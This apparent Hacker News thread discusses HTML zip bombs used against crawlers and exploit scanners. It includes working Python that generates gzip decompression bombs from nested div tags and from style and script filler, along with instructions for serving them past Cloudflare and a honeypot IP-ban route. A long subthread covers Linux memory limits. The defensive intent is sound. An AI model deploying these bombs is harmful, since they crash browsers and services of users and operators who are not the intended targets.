Neat approach. I make my anti-crawler HTML zip bombs like this:
So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
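A minimal sketch of one way to generate such a file, assuming Python's gzip module (the sizes, tag count, and output name are illustrative, not the exact command used):

    # Stream deeply nested <div> tags straight into a gzip file, so the
    # multi-gigabyte decompressed document never has to exist in memory.
    import gzip

    TOTAL_TAGS = 200_000_000                 # ~1 GB of "<div>" once decompressed
    BLOCK = b"<div>" * 100_000               # write in blocks to keep it fast

    with gzip.open("divbomb.html.gz", "wb", compresslevel=9) as out:
        out.write(b"<!doctype html><html><body>")
        for _ in range(TOTAL_TAGS // 100_000):
            out.write(BLOCK)
        # Closing tags are deliberately omitted; a parser gives up long before EOF.

The result is then served with `Content-Encoding: gzip` so the client inflates it itself.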
This is a great idea. LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.
We need more ideas like this!
This is the same idea as in the article, just an alternative flavor of generating the zip bomb.
And I actually only serve this to exploit scanners, not LLM crawlers.
I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:
- The site's robots.txt didn't actually say what the author thought they had made it say
- The crawler had nothing to do with the crawler it was claiming to be; it just hijacked a user agent to deflect blame
It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.
Perplexity certainly was ignoring robots.txt [0]
Anthropic... Their robots.txt requires a delay to be defined, even though it's an optional extension. But whatever.
[0] https://www.wired.com/story/perplexity-is-a-bullshit-machine...
There's plenty of evidence to the contrary;
https://mjtsai.com/blog/2024/06/24/ai-companies-ignoring-rob...
Nice command line.
Note: the submission link is not the zip bomb. It’s safe to click.
Sounds like something a person linking to a zip bomb would say :-D
I can imagine the large-scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb, it could be they just discard the chunks that are inside a comment. The same trick could be applied to other elements in the HTML, though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs, that could also have an amplifying effect on the bad scraper.
There are definitely improvements that can be made. The comment part is more about aesthetics; it is not actually needed, you could have just put the zip chunk in a `div`, I guess.
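As a rough illustration of that idea, a hedged Python sketch that puts the filler outside HTML comments, as a run of semicolons in a `<style>` tag and a giant string constant in inline JS (sizes and the output name are arbitrary):

    # Same zip-bomb idea, but the repetitive filler lives in places a
    # comment-stripping scraper still has to buffer: the stylesheet and an
    # inline JS string constant.
    import gzip

    STYLE_CHUNK = b";" * 10_000_000          # 10 MB of semicolons per write
    JS_CHUNK = b"A" * 10_000_000             # 10 MB of string constant per write

    with gzip.open("carrier-bomb.html.gz", "wb", compresslevel=9) as out:
        out.write(b"<html><head><style>")
        for _ in range(10):
            out.write(STYLE_CHUNK)           # ~100 MB inside <style>
        out.write(b"</style></head><body><script>var junk='")
        for _ in range(10):
            out.write(JS_CHUNK)              # ~100 MB inline JS constant
        out.write(b"';</script></body></html>")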
For every 1 robots.txt that is genuinely configured, there are 9 that make absolutely no sense at all.
Worse. GETing the robots.txt automatically flags you as a 'bot'!
So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that the cheapest junior webadmin you hired copy/pasted there from some reddit comment, we now have to jump through hoops such as getting the robots.txt from a separate VPN, etc.
Well, robots.txt being an opaque, opt-out system was broken from the start. I've just started having hidden links and pages only mentioned in robots.txt, and any IP that tries those is immediately blocked for 24 hours. There is no reason to continue entertaining these companies.
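For what it's worth, a minimal sketch of that kind of trap, assuming Flask and an in-memory ban list (the trap path and storage are illustrative; a real setup would more likely push the ban to a firewall or shared store):

    # A URL that is only ever mentioned in robots.txt (e.g. "Disallow:
    # /only-in-robots/"), so any client requesting it has read robots.txt
    # and chosen to ignore it.
    import time
    from flask import Flask, abort, request

    app = Flask(__name__)
    banned = {}                              # ip -> ban expiry timestamp
    BAN_SECONDS = 24 * 3600

    @app.before_request
    def reject_banned_ips():
        expiry = banned.get(request.remote_addr)
        if expiry and expiry > time.time():
            abort(403)

    @app.route("/only-in-robots/")           # hypothetical trap path
    def trap():
        banned[request.remote_addr] = time.time() + BAN_SECONDS
        abort(403)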
If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?
If you're doing this through cloudflare, you'll want to add the response header
    cache-control: no-transform

so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.

That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
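A hedged sketch of serving a pre-compressed bomb with that header (Flask and the filenames assumed here purely for illustration):

    # Serve the already-gzipped payload as-is: Content-Encoding makes the
    # client inflate it, and Cache-Control: no-transform asks intermediaries
    # like Cloudflare not to decompress and recompress it along the way.
    from flask import Flask, Response

    app = Flask(__name__)

    @app.route("/trap.html")                 # hypothetical path
    def trap():
        with open("divbomb.html.gz", "rb") as f:
            payload = f.read()               # a few MB compressed
        return Response(
            payload,
            mimetype="text/html",
            headers={
                "Content-Encoding": "gzip",
                "Cache-Control": "no-transform",
            },
        )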
Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/
Do you think Meta AI's Llama 4 failed so badly because they ended up crawling a bunch of labyrinths?
I dislike that the website's sidebar all of a sudden collapses during scrolling; it shifts all the content to the left in the middle of reading.
That content shift on page scroll is horrendous. Please don't do that, there is no need to auto-hide a sidebar.
Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.
Crashes Safari on iOS (not technically crashing the whole app, but the tab displays an internal WebKit error).
Crashed 1Password on Safari haha
Risky click
Did not crash Firefox or Chrome for me on Linux.
Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128GB with swap, and it still crashes (silently on Firefox and with a dedicated crash screen on Chrome).
Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
Usually in /etc/security/limits.conf. The field `as` for address space would be my guess, but I'm not sure; maybe `data`. The man page `man limits.conf` isn't very descriptive.
> The man page `man limits.conf` isn't very descriptive.
Looks to me like it's quite descriptive. What information do you think is missing?
https://www.man7.org/linux/man-pages/man5/limits.conf.5.html
What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?
What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
I have a bunch of questions.
> I have a bunch of questions.
If I were reading the documentation for higher-level language APIs, I'd also read the documentation for setting up and using the associated types.
With well-written documentation, there's usually related information and/or see-also. Indeed, this has `SEE ALSO` for `getrlimit(2)`, which is equivalent to `man 2 getrlimit` [0].
From there, things are a bit more descriptive:

RLIMIT_AS
       This is the maximum size of the process's virtual memory
       (address space). The limit is specified in bytes, and is
       rounded down to the system page size. This limit affects
       calls to brk(2), mmap(2), and mremap(2), which fail with
       the error ENOMEM upon exceeding this limit. In addition,
       automatic stack expansion fails (and generates a SIGSEGV
       that kills the process if no alternate stack has been made
       available via sigaltstack(2)). Since the value is a long,
       on machines with a 32-bit long either this limit is at most
       2 GiB, or this resource is unlimited.

RLIMIT_DATA
       This is the maximum size of the process's data segment
       (initialized data, uninitialized data, and heap). The
       limit is specified in bytes, and is rounded down to the
       system page size. This limit affects calls to brk(2),
       sbrk(2), and (since Linux 4.7) mmap(2), which fail with the
       error ENOMEM upon encountering the soft limit of this
       resource.
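For a quick, hands-on feel for those two limits, a small Python sketch using the standard `resource` module (the 2 GiB cap is arbitrary):

    # Inspect RLIMIT_AS / RLIMIT_DATA for the current process, then lower the
    # soft address-space limit so a big allocation fails with ENOMEM
    # (surfacing as MemoryError) instead of pushing the machine into swap.
    import resource

    for name in ("RLIMIT_AS", "RLIMIT_DATA"):
        soft, hard = resource.getrlimit(getattr(resource, name))
        print(name, soft, hard)              # -1 means RLIM_INFINITY

    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    resource.setrlimit(resource.RLIMIT_AS, (2 * 1024**3, hard))   # ~2 GiB soft cap

    try:
        blob = bytearray(4 * 1024**3)        # a 4 GiB request should now fail
    except MemoryError:
        print("allocation refused once the soft limit was hit")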
The documentation also links to the affected system calls (`brk` [1], `sbrk` [1], `mmap` [2], `mremap` [3], and `sigaltstack` [4]). Note that all of this is in sections 2 and 3 of the manual, for system interface calls and libraries that interact with the system. You might find some installations of Linux complaining about missing documentation (eg minimalized containers and/or release distros -- documentation takes up a decent chunk of disk space and isn't generally needed outside of a developer's workstation), in which case the most likely fix is to re/install the documentation package via your package manager.

So,
> What is `data` ? "maximum data size (KB)".
"data" is the process's data segment [1]. Perhaps this might be clearer, but it is fairly well defined if you then read the documentation for `brk` [1]:
This rabbit hole goes into describing system internals for process memory layouts [5], and it can expand pretty widely into the hows and whys. This level of system knowledge is literally understanding your operating system and... it's IMO well documented if you just keep searching terms that you're unfamiliar with; instead of `man` you might try `apropos` (and see `man apropos`). You'll end up exploring a huge chunk of the C-language system API, and a fair bit of glibc too.

Then,
> Is `address space limit (KB)` virtual or physical ?
First sentence of the C-language documentation for RLIMIT_AS:

       RLIMIT_AS
              This is the maximum size of the process's virtual memory
              (address space).
> What is maximum filesize in a context of a process ?!

System API `open()`, `opendir()`, `openat()`, [6] etc. with _system file descriptors_? Well, assuming your _file descriptor_ points to a file, then it's whatever the filesystem supports. But your system generally can support 32-bit or 64-bit offsets (depending on macros usually defined during kernel compilation) with `lseek` [7] and `off_t` [8], or you can force 64-bit support with `lseek64` [9] and `off64_t` [8], and fail to compile your app if your kernel wasn't compiled with 64-bit support.
It's more complicated if you use a different API (such as C's FILE* functions [10] or etc).
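As a small illustration of the 64-bit offset point, a Python sketch that creates a sparse file with data past the 4 GiB mark (the filename is arbitrary; on a build or filesystem without large-file support the seek or write would fail instead):

    # Seek beyond what a 32-bit off_t can address and write a few bytes there;
    # the result is a sparse file whose apparent size exceeds 4 GiB.
    import os

    fd = os.open("bigfile.bin", os.O_CREAT | os.O_WRONLY, 0o644)
    os.lseek(fd, 5 * 1024**3, os.SEEK_SET)   # offset well past 32 bits
    os.write(fd, b"end")
    os.close(fd)
    print(os.stat("bigfile.bin").st_size)    # ~5 GiB apparent size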
> what happens if a file is bigger?
I'm not sure -- I've never had to worry about it because I use the 64-bit APIs. You could try mounting a filesystem supporting 64-bit files, then write a file beyond 32-bits, then boot into a 32-bit OS and try mounting it and reading the file. You'll probably get an error code that you can then look up in the documentation. If it's not clear what it is, then the kernel source code is fairly easy to navigate to find where the error could come from and what it might mean, and I've done it for mremap failures.
> Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
That heavily depends on system architecture and your operating system support. But unless I'm mistaken with Linux on x86_64, just about any user-land virtual address page can be marked executable; but it's different in kernel-land with reserved/register/io address space.
And, as I understand it, the kernel memory-maps your executable from your filesystem. So, generally, user-land code can map to "anywhere" (this is good for ASLR safety) and could be executed even with minimal physical address space available. But in practice, your executable is mapped to within a certain region of the virtual address space, which leaves the other region of your address space available for allocations (this is how `brk` works). What's generally far more important is how much memory you might allocate during your program's lifecycle, and whether or not you end up fragmenting that memory.
In any case, the documentation for `/etc/security/limits.conf` (linked earlier) states:

       If a hard limit or soft limit of a resource is set to a valid
       value, but outside of the supported range of the local system, the
       system may reject the new limit or unexpected behavior may occur.
       If the control value required is used, the module will reject the
       login if a limit could not be set.
If you set your limits so low that you can't start processes because you run out of address space while trying to load them, then that might be classified as "unexpected behavior" if you didn't expect that to happen and so is... well documented. I don't see where it says anything about "valid value" or "supported range" for specific limits, but for those I would just poke around the kernel source code [11] where those C macros are used and look for limits around them. `grep -nR` [12] is what I'd use for that.

That's enough rabbit hole for me.
[0]: https://www.man7.org/linux/man-pages/man2/getrlimit.2.html
[1]: https://www.man7.org/linux/man-pages/man2/brk.2.html
[2]: https://www.man7.org/linux/man-pages/man2/mmap.2.html
[3]: https://www.man7.org/linux/man-pages/man2/mremap.2.html
[4]: https://www.man7.org/linux/man-pages/man2/sigaltstack.2.html
[5]: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format
[6]: https://man7.org/linux/man-pages/man2/open.2.html
[7]: https://man7.org/linux/man-pages/man2/lseek.2.html
[8]: https://man7.org/linux/man-pages/man3/off64_t.3type.html
[9]: https://man7.org/linux/man-pages/man3/lseek64.3.html
[10]: https://man7.org/linux/man-pages/man3/file.3type.html
[11]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...
[12]: https://man7.org/linux/man-pages/man1/grep.1.html
Crashed the Chrome tab on Windows instantly, but Firefox is fine. It shows as loading, but pressing Ctrl+U even shows the very start of that fake HTML.
Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to make a parser bail early.
For my usage, the compressed size difference with deeply nested divs was negligible.
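If you want to check that for yourself, a quick Python comparison of compressed sizes at the same decompressed length (sizes arbitrary):

    # Compare how well a repeated single character and nested <div> tags
    # compress when the decompressed payloads are the same size.
    import gzip

    n = 50_000_000                           # 50 MB decompressed in both cases
    flat = b"0" * n
    nested = b"<div>" * (n // 5)

    print("repeated char:", len(gzip.compress(flat, 9)))
    print("nested divs:  ", len(gzip.compress(nested, 9)))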
It crashed the tab in Brave on Android for me.
It crashed the tab on Vivaldi (Linux).
Imagine you're a crawler operator. Do you really have a problem with documents like this? I don't think so.
Related:
Fun with gzip bombs and email clients
https://news.ycombinator.com/item?id=44651536